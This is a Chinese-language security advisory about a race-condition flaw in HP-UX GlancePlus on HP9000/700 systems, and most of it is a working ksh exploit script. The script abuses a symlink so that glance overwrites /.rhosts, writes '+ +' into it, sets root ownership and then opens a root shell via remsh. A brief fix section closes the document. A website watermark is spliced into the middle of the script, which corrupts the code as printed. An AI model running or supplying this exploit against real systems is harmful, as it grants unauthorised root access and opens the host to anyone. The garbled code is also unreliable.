更新时间:2000-05-03
严重程度:高
威胁程度:远程管理员权限
错误类型:竞争条件
利用方式:服务器模式
受影响系统
HP9000/700
详细描述
/usr/perf/bin/glance存在安全漏洞.Glance Plus是一个运行状态监视程序.
测试代码
#!/bin/ksh
# exploit to work against the latest rev
that I know of for glance+
# Tested on 9000/700.. Don't even know if
it's available on 10.X
if [ ! -x /usr/perf/bin/glance ]
then
echo 'No diablo programme.'
echo 'Que si como es que.'
exit
fi
PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or
somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^$' -
iterations 1 -maxpages 1
echo '+ +' > /.rhosts
网管联盟www.bitsCN.com
if [ -f /tmp/rhosts-save ]
then
cat /tmp/rhosts-save >> /.rhosts
rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away?Why does
this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i
解决方案
在多个HP-UX系统安装中是作为演示程序或者独立购买。如果你不需要程序,你可以去掉在/usr/perf下的所有文件。 如果你要坚持使用此信息包,就控制目录访问权限, 并且去掉相应的SUID位。
相关信息